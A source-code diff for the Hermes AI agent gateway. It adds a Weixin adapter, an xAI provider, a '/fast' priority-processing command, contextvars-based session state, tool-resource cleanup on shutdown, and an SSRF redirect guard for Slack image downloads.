|
||||
if reaction_key in self._pending_reactions:
|
||||
eyes_event_id = self._pending_reactions.pop(reaction_key)
|
||||
if not await self._redact_reaction(room_id, eyes_event_id):
|
||||
logger.debug("Matrix: failed to redact eyes reaction %s", eyes_event_id)
|
||||
await self._send_reaction(
|
||||
room_id,
|
||||
msg_id,
|
||||
|
||||
@@ -39,6 +39,7 @@ from gateway.platforms.base import (
|
||||
MessageType,
|
||||
SendResult,
|
||||
SUPPORTED_DOCUMENT_TYPES,
|
||||
safe_url_for_log,
|
||||
cache_document_from_bytes,
|
||||
)
|
||||
|
||||
@@ -656,8 +657,19 @@ class SlackAdapter(BasePlatformAdapter):
|
||||
try:
|
||||
import httpx
|
||||
|
||||
async def _ssrf_redirect_guard(response):
|
||||
"""Re-check redirect targets so public URLs cannot bounce into private IPs."""
|
||||
if response.is_redirect and response.next_request:
|
||||
redirect_url = str(response.next_request.url)
|
||||
if not is_safe_url(redirect_url):
|
||||
raise ValueError("Blocked redirect to private/internal address")
|
||||
|
||||
# Download the image first
|
||||
async with httpx.AsyncClient(timeout=30.0, follow_redirects=True) as client:
|
||||
async with httpx.AsyncClient(
|
||||
timeout=30.0,
|
||||
follow_redirects=True,
|
||||
event_hooks={"response": [_ssrf_redirect_guard]},
|
||||
) as client:
|
||||
response = await client.get(image_url)
|
||||
response.raise_for_status()
|
||||
|
||||
@@ -674,7 +686,7 @@ class SlackAdapter(BasePlatformAdapter):
|
||||
except Exception as e: # pragma: no cover - defensive logging
|
||||
logger.warning(
|
||||
"[Slack] Failed to upload image from URL %s, falling back to text: %s",
|
||||
image_url,
|
||||
safe_url_for_log(image_url),
|
||||
e,
|
||||
exc_info=True,
|
||||
)
|
||||
|
||||
@@ -518,6 +518,16 @@ class TelegramAdapter(BasePlatformAdapter):
|
||||
|
||||
# Build the application
|
||||
builder = Application.builder().token(self.config.token)
|
||||
custom_base_url = self.config.extra.get("base_url")
|
||||
if custom_base_url:
|
||||
builder = builder.base_url(custom_base_url)
|
||||
builder = builder.base_file_url(
|
||||
self.config.extra.get("base_file_url", custom_base_url)
|
||||
)
|
||||
logger.info(
|
||||
"[%s] Using custom Telegram base_url: %s",
|
||||
self.name, custom_base_url,
|
||||
)
|
||||
|
||||
# PTB defaults (pool_timeout=1s) are too aggressive on flaky networks and
|
||||
# can trigger "Pool timeout: All connections in the connection pool are occupied"
|
||||
@@ -547,7 +557,6 @@ class TelegramAdapter(BasePlatformAdapter):
|
||||
for k in ("HTTPS_PROXY", "HTTP_PROXY", "ALL_PROXY", "https_proxy", "http_proxy", "all_proxy")
|
||||
)
|
||||
disable_fallback = (os.getenv("HERMES_TELEGRAM_DISABLE_FALLBACK_IPS", "").strip().lower() in ("1", "true", "yes", "on"))
|
||||
|
||||
fallback_ips = self._fallback_ips()
|
||||
if not fallback_ips:
|
||||
fallback_ips = await discover_fallback_ips()
|
||||
@@ -2793,5 +2802,5 @@ class TelegramAdapter(BasePlatformAdapter):
|
||||
await self._set_reaction(
|
||||
chat_id,
|
||||
message_id,
|
||||
"\u2705" if outcome == ProcessingOutcome.SUCCESS else "\u274c",
|
||||
"\U0001f44d" if outcome == ProcessingOutcome.SUCCESS else "\U0001f44e",
|
||||
)
|
||||
|
||||
@@ -201,6 +201,7 @@ class WebhookAdapter(BasePlatformAdapter):
|
||||
"dingtalk",
|
||||
"feishu",
|
||||
"wecom",
|
||||
"weixin",
|
||||
"bluebubbles",
|
||||
):
|
||||
return await self._deliver_cross_platform(
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
+247
-53
@@ -481,6 +481,7 @@ class GatewayRunner:
|
||||
self._prefill_messages = self._load_prefill_messages()
|
||||
self._ephemeral_system_prompt = self._load_ephemeral_system_prompt()
|
||||
self._reasoning_config = self._load_reasoning_config()
|
||||
self._service_tier = self._load_service_tier()
|
||||
self._show_reasoning = self._load_show_reasoning()
|
||||
self._provider_routing = self._load_provider_routing()
|
||||
self._fallback_model = self._load_fallback_model()
|
||||
@@ -776,6 +777,7 @@ class GatewayRunner:
|
||||
|
||||
def _resolve_turn_agent_config(self, user_message: str, model: str, runtime_kwargs: dict) -> dict:
|
||||
from agent.smart_model_routing import resolve_turn_route
|
||||
from hermes_cli.models import resolve_fast_mode_overrides
|
||||
|
||||
primary = {
|
||||
"model": model,
|
||||
@@ -787,7 +789,19 @@ class GatewayRunner:
|
||||
"args": list(runtime_kwargs.get("args") or []),
|
||||
"credential_pool": runtime_kwargs.get("credential_pool"),
|
||||
}
|
||||
return resolve_turn_route(user_message, getattr(self, "_smart_model_routing", {}), primary)
|
||||
route = resolve_turn_route(user_message, getattr(self, "_smart_model_routing", {}), primary)
|
||||
|
||||
service_tier = getattr(self, "_service_tier", None)
|
||||
if not service_tier:
|
||||
route["request_overrides"] = None
|
||||
return route
|
||||
|
||||
try:
|
||||
overrides = resolve_fast_mode_overrides(route.get("model"))
|
||||
except Exception:
|
||||
overrides = None
|
||||
route["request_overrides"] = overrides
|
||||
return route
|
||||
|
||||
async def _handle_adapter_fatal_error(self, adapter: BasePlatformAdapter) -> None:
|
||||
"""React to an adapter failure after startup.
|
||||
@@ -939,6 +953,33 @@ class GatewayRunner:
|
||||
logger.warning("Unknown reasoning_effort '%s', using default (medium)", effort)
|
||||
return result
|
||||
|
||||
@staticmethod
|
||||
def _load_service_tier() -> str | None:
|
||||
"""Load Priority Processing setting from config.yaml.
|
||||
|
||||
Reads agent.service_tier from config.yaml. Accepted values mirror the CLI:
|
||||
"fast"/"priority"/"on" => "priority", while "normal"/"off" disables it.
|
||||
Returns None when unset or unsupported.
|
||||
"""
|
||||
raw = ""
|
||||
try:
|
||||
import yaml as _y
|
||||
cfg_path = _hermes_home / "config.yaml"
|
||||
if cfg_path.exists():
|
||||
with open(cfg_path, encoding="utf-8") as _f:
|
||||
cfg = _y.safe_load(_f) or {}
|
||||
raw = str(cfg.get("agent", {}).get("service_tier", "") or "").strip()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
value = raw.lower()
|
||||
if not value or value in {"normal", "default", "standard", "off", "none"}:
|
||||
return None
|
||||
if value in {"fast", "priority", "on"}:
|
||||
return "priority"
|
||||
logger.warning("Unknown service_tier '%s', ignoring", raw)
|
||||
return None
|
||||
|
||||
@staticmethod
|
||||
def _load_show_reasoning() -> bool:
|
||||
"""Load show_reasoning toggle from config.yaml display section."""
|
||||
@@ -1069,6 +1110,7 @@ class GatewayRunner:
|
||||
"MATRIX_ALLOWED_USERS", "DINGTALK_ALLOWED_USERS",
|
||||
"FEISHU_ALLOWED_USERS",
|
||||
"WECOM_ALLOWED_USERS",
|
||||
"WEIXIN_ALLOWED_USERS",
|
||||
"BLUEBUBBLES_ALLOWED_USERS",
|
||||
"GATEWAY_ALLOWED_USERS")
|
||||
)
|
||||
@@ -1081,6 +1123,7 @@ class GatewayRunner:
|
||||
"MATRIX_ALLOW_ALL_USERS", "DINGTALK_ALLOW_ALL_USERS",
|
||||
"FEISHU_ALLOW_ALL_USERS",
|
||||
"WECOM_ALLOW_ALL_USERS",
|
||||
"WEIXIN_ALLOW_ALL_USERS",
|
||||
"BLUEBUBBLES_ALLOW_ALL_USERS")
|
||||
)
|
||||
if not _any_allowlist and not _allow_all:
|
||||
@@ -1305,12 +1348,28 @@ class GatewayRunner:
|
||||
for key, entry in _expired_entries:
|
||||
try:
|
||||
await self._async_flush_memories(entry.session_id)
|
||||
# Shut down memory provider on the cached agent
|
||||
cached_agent = self._running_agents.get(key)
|
||||
if cached_agent and cached_agent is not _AGENT_PENDING_SENTINEL:
|
||||
# Shut down memory provider and close tool resources
|
||||
# on the cached agent. Idle agents live in
|
||||
# _agent_cache (not _running_agents), so look there.
|
||||
_cached_agent = None
|
||||
_cache_lock = getattr(self, "_agent_cache_lock", None)
|
||||
if _cache_lock is not None:
|
||||
with _cache_lock:
|
||||
_cached = self._agent_cache.get(key)
|
||||
_cached_agent = _cached[0] if isinstance(_cached, tuple) else _cached if _cached else None
|
||||
# Fall back to _running_agents in case the agent is
|
||||
# still mid-turn when the expiry fires.
|
||||
if _cached_agent is None:
|
||||
_cached_agent = self._running_agents.get(key)
|
||||
if _cached_agent and _cached_agent is not _AGENT_PENDING_SENTINEL:
|
||||
try:
|
||||
if hasattr(cached_agent, 'shutdown_memory_provider'):
|
||||
cached_agent.shutdown_memory_provider()
|
||||
if hasattr(_cached_agent, 'shutdown_memory_provider'):
|
||||
_cached_agent.shutdown_memory_provider()
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
if hasattr(_cached_agent, 'close'):
|
||||
_cached_agent.close()
|
||||
except Exception:
|
||||
pass
|
||||
# Mark as flushed and persist to disk so the flag
|
||||
@@ -1493,6 +1552,14 @@ class GatewayRunner:
|
||||
agent.shutdown_memory_provider()
|
||||
except Exception:
|
||||
pass
|
||||
# Close tool resources (terminal sandboxes, browser daemons,
|
||||
# background processes, httpx clients) to prevent zombie
|
||||
# process accumulation.
|
||||
try:
|
||||
if hasattr(agent, 'close'):
|
||||
agent.close()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
for platform, adapter in list(self.adapters.items()):
|
||||
try:
|
||||
@@ -1515,7 +1582,25 @@ class GatewayRunner:
|
||||
self._pending_messages.clear()
|
||||
self._pending_approvals.clear()
|
||||
self._shutdown_event.set()
|
||||
|
||||
|
||||
# Global cleanup: kill any remaining tool subprocesses not tied
|
||||
# to a specific agent (catch-all for zombie prevention).
|
||||
try:
|
||||
from tools.process_registry import process_registry
|
||||
process_registry.kill_all()
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
from tools.terminal_tool import cleanup_all_environments
|
||||
cleanup_all_environments()
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
from tools.browser_tool import cleanup_all_browsers
|
||||
cleanup_all_browsers()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
from gateway.status import remove_pid_file, write_runtime_status
|
||||
remove_pid_file()
|
||||
try:
|
||||
@@ -1622,6 +1707,13 @@ class GatewayRunner:
|
||||
return None
|
||||
return WeComAdapter(config)
|
||||
|
||||
elif platform == Platform.WEIXIN:
|
||||
from gateway.platforms.weixin import WeixinAdapter, check_weixin_requirements
|
||||
if not check_weixin_requirements():
|
||||
logger.warning("Weixin: aiohttp/cryptography not installed")
|
||||
return None
|
||||
return WeixinAdapter(config)
|
||||
|
||||
elif platform == Platform.MATTERMOST:
|
||||
from gateway.platforms.mattermost import MattermostAdapter, check_mattermost_requirements
|
||||
if not check_mattermost_requirements():
|
||||
@@ -1697,6 +1789,7 @@ class GatewayRunner:
|
||||
Platform.DINGTALK: "DINGTALK_ALLOWED_USERS",
|
||||
Platform.FEISHU: "FEISHU_ALLOWED_USERS",
|
||||
Platform.WECOM: "WECOM_ALLOWED_USERS",
|
||||
Platform.WEIXIN: "WEIXIN_ALLOWED_USERS",
|
||||
Platform.BLUEBUBBLES: "BLUEBUBBLES_ALLOWED_USERS",
|
||||
}
|
||||
platform_allow_all_map = {
|
||||
@@ -1712,6 +1805,7 @@ class GatewayRunner:
|
||||
Platform.DINGTALK: "DINGTALK_ALLOW_ALL_USERS",
|
||||
Platform.FEISHU: "FEISHU_ALLOW_ALL_USERS",
|
||||
Platform.WECOM: "WECOM_ALLOW_ALL_USERS",
|
||||
Platform.WEIXIN: "WEIXIN_ALLOW_ALL_USERS",
|
||||
Platform.BLUEBUBBLES: "BLUEBUBBLES_ALLOW_ALL_USERS",
|
||||
}
|
||||
|
||||
@@ -2077,6 +2171,9 @@ class GatewayRunner:
|
||||
if canonical == "reasoning":
|
||||
return await self._handle_reasoning_command(event)
|
||||
|
||||
if canonical == "fast":
|
||||
return await self._handle_fast_command(event)
|
||||
|
||||
if canonical == "verbose":
|
||||
return await self._handle_verbose_command(event)
|
||||
|
||||
@@ -2345,8 +2442,8 @@ class GatewayRunner:
|
||||
# Build session context
|
||||
context = build_session_context(source, self.config, session_entry)
|
||||
|
||||
# Set environment variables for tools
|
||||
self._set_session_env(context)
|
||||
# Set session context variables for tools (task-local, concurrency-safe)
|
||||
_session_env_tokens = self._set_session_env(context)
|
||||
|
||||
# Read privacy.redact_pii from config (re-read per message)
|
||||
_redact_pii = False
|
||||
@@ -2419,37 +2516,41 @@ class GatewayRunner:
|
||||
session_entry.was_auto_reset = False
|
||||
session_entry.auto_reset_reason = None
|
||||
|
||||
# Auto-load skill for DM topic bindings (e.g., Telegram Private Chat Topics)
|
||||
# Only inject on NEW sessions — for ongoing conversations the skill content
|
||||
# is already in the conversation history from the first message.
|
||||
if _is_new_session and getattr(event, "auto_skill", None):
|
||||
# Auto-load skill(s) for topic/channel bindings (Telegram DM Topics,
|
||||
# Discord channel_skill_bindings). Supports a single name or ordered list.
|
||||
# Only inject on NEW sessions — ongoing conversations already have the
|
||||
# skill content in their conversation history from the first message.
|
||||
_auto = getattr(event, "auto_skill", None)
|
||||
if _is_new_session and _auto:
|
||||
_skill_names = [_auto] if isinstance(_auto, str) else list(_auto)
|
||||
try:
|
||||
from agent.skill_commands import _load_skill_payload, _build_skill_message
|
||||
_skill_name = event.auto_skill
|
||||
_loaded = _load_skill_payload(_skill_name, task_id=_quick_key)
|
||||
if _loaded:
|
||||
_loaded_skill, _skill_dir, _display_name = _loaded
|
||||
_activation_note = (
|
||||
f'[SYSTEM: This conversation is in a topic with the "{_display_name}" skill '
|
||||
f"auto-loaded. Follow its instructions for the duration of this session.]"
|
||||
)
|
||||
_skill_msg = _build_skill_message(
|
||||
_loaded_skill, _skill_dir, _activation_note,
|
||||
user_instruction=event.text,
|
||||
)
|
||||
if _skill_msg:
|
||||
event.text = _skill_msg
|
||||
logger.info(
|
||||
"[Gateway] Auto-loaded skill '%s' for DM topic session %s",
|
||||
_skill_name, session_key,
|
||||
_combined_parts: list[str] = []
|
||||
_loaded_names: list[str] = []
|
||||
for _sname in _skill_names:
|
||||
_loaded = _load_skill_payload(_sname, task_id=_quick_key)
|
||||
if _loaded:
|
||||
_loaded_skill, _skill_dir, _display_name = _loaded
|
||||
_note = (
|
||||
f'[SYSTEM: The "{_display_name}" skill is auto-loaded. '
|
||||
f"Follow its instructions for this session.]"
|
||||
)
|
||||
else:
|
||||
logger.warning(
|
||||
"[Gateway] DM topic skill '%s' not found in available skills",
|
||||
_skill_name,
|
||||
_part = _build_skill_message(_loaded_skill, _skill_dir, _note)
|
||||
if _part:
|
||||
_combined_parts.append(_part)
|
||||
_loaded_names.append(_sname)
|
||||
else:
|
||||
logger.warning("[Gateway] Auto-skill '%s' not found", _sname)
|
||||
if _combined_parts:
|
||||
# Append the user's original text after all skill payloads
|
||||
_combined_parts.append(event.text)
|
||||
event.text = "\n\n".join(_combined_parts)
|
||||
logger.info(
|
||||
"[Gateway] Auto-loaded skill(s) %s for session %s",
|
||||
_loaded_names, session_key,
|
||||
)
|
||||
except Exception as e:
|
||||
logger.warning("[Gateway] Failed to auto-load topic skill '%s': %s", event.auto_skill, e)
|
||||
logger.warning("[Gateway] Failed to auto-load skill(s) %s: %s", _skill_names, e)
|
||||
|
||||
# Load conversation history from transcript
|
||||
history = self.session_store.load_transcript(session_entry.session_id)
|
||||
@@ -3175,8 +3276,8 @@ class GatewayRunner:
|
||||
"Try again or use /reset to start a fresh session."
|
||||
)
|
||||
finally:
|
||||
# Clear session env
|
||||
self._clear_session_env()
|
||||
# Restore session context variables to their pre-handler state
|
||||
self._clear_session_env(_session_env_tokens)
|
||||
|
||||
def _format_session_info(self) -> str:
|
||||
"""Resolve current model config and return a formatted info block.
|
||||
@@ -3276,8 +3377,22 @@ class GatewayRunner:
|
||||
_flush_task.add_done_callback(self._background_tasks.discard)
|
||||
except Exception as e:
|
||||
logger.debug("Gateway memory flush on reset failed: %s", e)
|
||||
# Close tool resources on the old agent (terminal sandboxes, browser
|
||||
# daemons, background processes) before evicting from cache.
|
||||
# Guard with getattr because test fixtures may skip __init__.
|
||||
_cache_lock = getattr(self, "_agent_cache_lock", None)
|
||||
if _cache_lock is not None:
|
||||
with _cache_lock:
|
||||
_cached = self._agent_cache.get(session_key)
|
||||
_old_agent = _cached[0] if isinstance(_cached, tuple) else _cached if _cached else None
|
||||
if _old_agent is not None:
|
||||
try:
|
||||
if hasattr(_old_agent, "close"):
|
||||
_old_agent.close()
|
||||
except Exception:
|
||||
pass
|
||||
self._evict_cached_agent(session_key)
|
||||
|
||||
|
||||
try:
|
||||
from tools.env_passthrough import clear_env_passthrough
|
||||
clear_env_passthrough()
|
||||
@@ -3846,6 +3961,7 @@ class GatewayRunner:
|
||||
|
||||
# Resolve current provider from config
|
||||
current_provider = "openrouter"
|
||||
model_cfg = {}
|
||||
config_path = _hermes_home / 'config.yaml'
|
||||
try:
|
||||
if config_path.exists():
|
||||
@@ -4586,6 +4702,7 @@ class GatewayRunner:
|
||||
max_iterations = int(os.getenv("HERMES_MAX_ITERATIONS", "90"))
|
||||
reasoning_config = self._load_reasoning_config()
|
||||
self._reasoning_config = reasoning_config
|
||||
self._service_tier = self._load_service_tier()
|
||||
turn_route = self._resolve_turn_agent_config(prompt, model, runtime_kwargs)
|
||||
|
||||
def run_sync():
|
||||
@@ -4597,6 +4714,8 @@ class GatewayRunner:
|
||||
verbose_logging=False,
|
||||
enabled_toolsets=enabled_toolsets,
|
||||
reasoning_config=reasoning_config,
|
||||
service_tier=self._service_tier,
|
||||
request_overrides=turn_route.get("request_overrides"),
|
||||
providers_allowed=pr.get("only"),
|
||||
providers_ignored=pr.get("ignore"),
|
||||
providers_order=pr.get("order"),
|
||||
@@ -4746,6 +4865,7 @@ class GatewayRunner:
|
||||
model = _resolve_gateway_model(user_config)
|
||||
platform_key = _platform_config_key(source.platform)
|
||||
reasoning_config = self._load_reasoning_config()
|
||||
self._service_tier = self._load_service_tier()
|
||||
turn_route = self._resolve_turn_agent_config(question, model, runtime_kwargs)
|
||||
pr = self._provider_routing
|
||||
|
||||
@@ -4772,6 +4892,8 @@ class GatewayRunner:
|
||||
verbose_logging=False,
|
||||
enabled_toolsets=[],
|
||||
reasoning_config=reasoning_config,
|
||||
service_tier=self._service_tier,
|
||||
request_overrides=turn_route.get("request_overrides"),
|
||||
providers_allowed=pr.get("only"),
|
||||
providers_ignored=pr.get("ignore"),
|
||||
providers_order=pr.get("order"),
|
||||
@@ -4925,6 +5047,66 @@ class GatewayRunner:
|
||||
else:
|
||||
return f"🧠 ✓ Reasoning effort set to `{effort}` (this session only)"
|
||||
|
||||
async def _handle_fast_command(self, event: MessageEvent) -> str:
|
||||
"""Handle /fast — mirror the CLI Priority Processing toggle in gateway chats."""
|
||||
import yaml
|
||||
from hermes_cli.models import model_supports_fast_mode
|
||||
|
||||
args = event.get_command_args().strip().lower()
|
||||
config_path = _hermes_home / "config.yaml"
|
||||
self._service_tier = self._load_service_tier()
|
||||
|
||||
user_config = _load_gateway_config()
|
||||
model = _resolve_gateway_model(user_config)
|
||||
if not model_supports_fast_mode(model):
|
||||
return "⚡ /fast is only available for OpenAI models that support Priority Processing."
|
||||
|
||||
def _save_config_key(key_path: str, value):
|
||||
"""Save a dot-separated key to config.yaml."""
|
||||
try:
|
||||
user_config = {}
|
||||
if config_path.exists():
|
||||
with open(config_path, encoding="utf-8") as f:
|
||||
user_config = yaml.safe_load(f) or {}
|
||||
keys = key_path.split(".")
|
||||
current = user_config
|
||||
for k in keys[:-1]:
|
||||
if k not in current or not isinstance(current[k], dict):
|
||||
current[k] = {}
|
||||
current = current[k]
|
||||
current[keys[-1]] = value
|
||||
atomic_yaml_write(config_path, user_config)
|
||||
return True
|
||||
except Exception as e:
|
||||
logger.error("Failed to save config key %s: %s", key_path, e)
|
||||
return False
|
||||
|
||||
if not args or args == "status":
|
||||
status = "fast" if self._service_tier == "priority" else "normal"
|
||||
return (
|
||||
"⚡ Priority Processing\n\n"
|
||||
f"Current mode: `{status}`\n\n"
|
||||
"_Usage:_ `/fast <normal|fast|status>`"
|
||||
)
|
||||
|
||||
if args in {"fast", "on"}:
|
||||
self._service_tier = "priority"
|
||||
saved_value = "fast"
|
||||
label = "FAST"
|
||||
elif args in {"normal", "off"}:
|
||||
self._service_tier = None
|
||||
saved_value = "normal"
|
||||
label = "NORMAL"
|
||||
else:
|
||||
return (
|
||||
f"⚠️ Unknown argument: `{args}`\n\n"
|
||||
"**Valid options:** normal, fast, status"
|
||||
)
|
||||
|
||||
if _save_config_key("agent.service_tier", saved_value):
|
||||
return f"⚡ ✓ Priority Processing: **{label}** (saved to config)\n_(takes effect on next message)_"
|
||||
return f"⚡ ✓ Priority Processing: **{label}** (this session only)"
|
||||
|
||||
async def _handle_yolo_command(self, event: MessageEvent) -> str:
|
||||
"""Handle /yolo — toggle dangerous command approval bypass for this session only."""
|
||||
from tools.approval import (
|
||||
@@ -5606,7 +5788,7 @@ class GatewayRunner:
|
||||
Platform.TELEGRAM, Platform.DISCORD, Platform.SLACK, Platform.WHATSAPP,
|
||||
Platform.SIGNAL, Platform.MATTERMOST, Platform.MATRIX,
|
||||
Platform.HOMEASSISTANT, Platform.EMAIL, Platform.SMS, Platform.DINGTALK,
|
||||
Platform.FEISHU, Platform.WECOM, Platform.BLUEBUBBLES, Platform.LOCAL,
|
||||
Platform.FEISHU, Platform.WECOM, Platform.WEIXIN, Platform.BLUEBUBBLES, Platform.LOCAL,
|
||||
})
|
||||
|
||||
async def _handle_update_command(self, event: MessageEvent) -> str:
|
||||
@@ -5994,20 +6176,27 @@ class GatewayRunner:
|
||||
|
||||
return True
|
||||
|
||||
def _set_session_env(self, context: SessionContext) -> None:
|
||||
"""Set environment variables for the current session."""
|
||||
os.environ["HERMES_SESSION_PLATFORM"] = context.source.platform.value
|
||||
os.environ["HERMES_SESSION_CHAT_ID"] = context.source.chat_id
|
||||
if context.source.chat_name:
|
||||
os.environ["HERMES_SESSION_CHAT_NAME"] = context.source.chat_name
|
||||
if context.source.thread_id:
|
||||
os.environ["HERMES_SESSION_THREAD_ID"] = str(context.source.thread_id)
|
||||
|
||||
def _clear_session_env(self) -> None:
|
||||
"""Clear session environment variables."""
|
||||
for var in ["HERMES_SESSION_PLATFORM", "HERMES_SESSION_CHAT_ID", "HERMES_SESSION_CHAT_NAME", "HERMES_SESSION_THREAD_ID"]:
|
||||
if var in os.environ:
|
||||
del os.environ[var]
|
||||
def _set_session_env(self, context: SessionContext) -> list:
|
||||
"""Set session context variables for the current async task.
|
||||
|
||||
Uses ``contextvars`` instead of ``os.environ`` so that concurrent
|
||||
gateway messages cannot overwrite each other's session state.
|
||||
|
||||
Returns a list of reset tokens; pass them to ``_clear_session_env``
|
||||
in a ``finally`` block.
|
||||
"""
|
||||
from gateway.session_context import set_session_vars
|
||||
return set_session_vars(
|
||||
platform=context.source.platform.value,
|
||||
chat_id=context.source.chat_id,
|
||||
chat_name=context.source.chat_name or "",
|
||||
thread_id=str(context.source.thread_id) if context.source.thread_id else "",
|
||||
)
|
||||
|
||||
def _clear_session_env(self, tokens: list) -> None:
|
||||
"""Restore session context variables to their pre-handler values."""
|
||||
from gateway.session_context import clear_session_vars
|
||||
clear_session_vars(tokens)
|
||||
|
||||
async def _enrich_message_with_vision(
|
||||
self,
|
||||
@@ -6755,6 +6944,7 @@ class GatewayRunner:
|
||||
pr = self._provider_routing
|
||||
reasoning_config = self._load_reasoning_config()
|
||||
self._reasoning_config = reasoning_config
|
||||
self._service_tier = self._load_service_tier()
|
||||
# Set up streaming consumer if enabled
|
||||
_stream_consumer = None
|
||||
_stream_delta_cb = None
|
||||
@@ -6817,6 +7007,8 @@ class GatewayRunner:
|
||||
ephemeral_system_prompt=combined_ephemeral or None,
|
||||
prefill_messages=self._prefill_messages or None,
|
||||
reasoning_config=reasoning_config,
|
||||
service_tier=self._service_tier,
|
||||
request_overrides=turn_route.get("request_overrides"),
|
||||
providers_allowed=pr.get("only"),
|
||||
providers_ignored=pr.get("ignore"),
|
||||
providers_order=pr.get("order"),
|
||||
@@ -6841,6 +7033,8 @@ class GatewayRunner:
|
||||
agent.stream_delta_callback = _stream_delta_cb
|
||||
agent.status_callback = _status_callback_sync
|
||||
agent.reasoning_config = reasoning_config
|
||||
agent.service_tier = self._service_tier
|
||||
agent.request_overrides = turn_route.get("request_overrides")
|
||||
|
||||
# Background review delivery — send "💾 Memory updated" etc. to user
|
||||
def _bg_review_send(message: str) -> None:
|
||||
|
||||
@@ -0,0 +1,113 @@
|
||||
"""
|
||||
Session-scoped context variables for the Hermes gateway.
|
||||
|
||||
Replaces the previous ``os.environ``-based session state
|
||||
(``HERMES_SESSION_PLATFORM``, ``HERMES_SESSION_CHAT_ID``, etc.) with
|
||||
Python's ``contextvars.ContextVar``.
|
||||
|
||||
**Why this matters**
|
||||
|
||||
The gateway processes messages concurrently via ``asyncio``. When two
|
||||
messages arrive at the same time the old code did:
|
||||
|
||||
os.environ["HERMES_SESSION_THREAD_ID"] = str(context.source.thread_id)
|
||||
|
||||
Because ``os.environ`` is *process-global*, Message A's value was
|
||||
silently overwritten by Message B before Message A's agent finished
|
||||
running. Background-task notifications and tool calls therefore routed
|
||||
to the wrong thread.
|
||||
|
||||
``contextvars.ContextVar`` values are *task-local*: each ``asyncio``
|
||||
task (and any ``run_in_executor`` thread it spawns) gets its own copy,
|
||||
so concurrent messages never interfere.
|
||||
|
||||
**Backward compatibility**
|
||||
|
||||
The public helper ``get_session_env(name, default="")`` mirrors the old
|
||||
``os.getenv("HERMES_SESSION_*", ...)`` calls. Existing tool code only
|
||||
needs to replace the import + call site:
|
||||
|
||||
# before
|
||||
import os
|
||||
platform = os.getenv("HERMES_SESSION_PLATFORM", "")
|
||||
|
||||
# after
|
||||
from gateway.session_context import get_session_env
|
||||
platform = get_session_env("HERMES_SESSION_PLATFORM", "")
|
||||
"""
|
||||
|
||||
from contextvars import ContextVar
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Per-task session variables
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
_SESSION_PLATFORM: ContextVar[str] = ContextVar("HERMES_SESSION_PLATFORM", default="")
|
||||
_SESSION_CHAT_ID: ContextVar[str] = ContextVar("HERMES_SESSION_CHAT_ID", default="")
|
||||
_SESSION_CHAT_NAME: ContextVar[str] = ContextVar("HERMES_SESSION_CHAT_NAME", default="")
|
||||
_SESSION_THREAD_ID: ContextVar[str] = ContextVar("HERMES_SESSION_THREAD_ID", default="")
|
||||
|
||||
_VAR_MAP = {
|
||||
"HERMES_SESSION_PLATFORM": _SESSION_PLATFORM,
|
||||
"HERMES_SESSION_CHAT_ID": _SESSION_CHAT_ID,
|
||||
"HERMES_SESSION_CHAT_NAME": _SESSION_CHAT_NAME,
|
||||
"HERMES_SESSION_THREAD_ID": _SESSION_THREAD_ID,
|
||||
}
|
||||
|
||||
|
||||
def set_session_vars(
|
||||
platform: str = "",
|
||||
chat_id: str = "",
|
||||
chat_name: str = "",
|
||||
thread_id: str = "",
|
||||
) -> list:
|
||||
"""Set all session context variables and return reset tokens.
|
||||
|
||||
Call ``clear_session_vars(tokens)`` in a ``finally`` block to restore
|
||||
the previous values when the handler exits.
|
||||
|
||||
Returns a list of ``Token`` objects (one per variable) that can be
|
||||
passed to ``clear_session_vars``.
|
||||
"""
|
||||
tokens = [
|
||||
_SESSION_PLATFORM.set(platform),
|
||||
_SESSION_CHAT_ID.set(chat_id),
|
||||
_SESSION_CHAT_NAME.set(chat_name),
|
||||
_SESSION_THREAD_ID.set(thread_id),
|
||||
]
|
||||
return tokens
|
||||
|
||||
|
||||
def clear_session_vars(tokens: list) -> None:
|
||||
"""Restore session context variables to their pre-handler values."""
|
||||
if not tokens:
|
||||
return
|
||||
vars_in_order = [
|
||||
_SESSION_PLATFORM,
|
||||
_SESSION_CHAT_ID,
|
||||
_SESSION_CHAT_NAME,
|
||||
_SESSION_THREAD_ID,
|
||||
]
|
||||
for var, token in zip(vars_in_order, tokens):
|
||||
var.reset(token)
|
||||
|
||||
|
||||
def get_session_env(name: str, default: str = "") -> str:
|
||||
"""Read a session context variable by its legacy ``HERMES_SESSION_*`` name.
|
||||
|
||||
Drop-in replacement for ``os.getenv("HERMES_SESSION_*", default)``.
|
||||
|
||||
Resolution order:
|
||||
1. Context variable (set by the gateway for concurrency-safe access)
|
||||
2. ``os.environ`` (used by CLI, cron scheduler, and tests)
|
||||
3. *default*
|
||||
"""
|
||||
import os
|
||||
|
||||
var = _VAR_MAP.get(name)
|
||||
if var is not None:
|
||||
value = var.get()
|
||||
if value:
|
||||
return value
|
||||
# Fall back to os.environ for CLI, cron, and test compatibility
|
||||
return os.getenv(name, default)
|
||||
+92
-2
@@ -198,6 +198,14 @@ PROVIDER_REGISTRY: Dict[str, ProviderConfig] = {
|
||||
api_key_env_vars=("DEEPSEEK_API_KEY",),
|
||||
base_url_env_var="DEEPSEEK_BASE_URL",
|
||||
),
|
||||
"xai": ProviderConfig(
|
||||
id="xai",
|
||||
name="xAI",
|
||||
auth_type="api_key",
|
||||
inference_base_url="https://api.x.ai/v1",
|
||||
api_key_env_vars=("XAI_API_KEY",),
|
||||
base_url_env_var="XAI_BASE_URL",
|
||||
),
|
||||
"ai-gateway": ProviderConfig(
|
||||
id="ai-gateway",
|
||||
name="AI Gateway",
|
||||
@@ -704,6 +712,27 @@ def write_credential_pool(provider_id: str, entries: List[Dict[str, Any]]) -> Pa
|
||||
return _save_auth_store(auth_store)
|
||||
|
||||
|
||||
def suppress_credential_source(provider_id: str, source: str) -> None:
|
||||
"""Mark a credential source as suppressed so it won't be re-seeded."""
|
||||
with _auth_store_lock():
|
||||
auth_store = _load_auth_store()
|
||||
suppressed = auth_store.setdefault("suppressed_sources", {})
|
||||
provider_list = suppressed.setdefault(provider_id, [])
|
||||
if source not in provider_list:
|
||||
provider_list.append(source)
|
||||
_save_auth_store(auth_store)
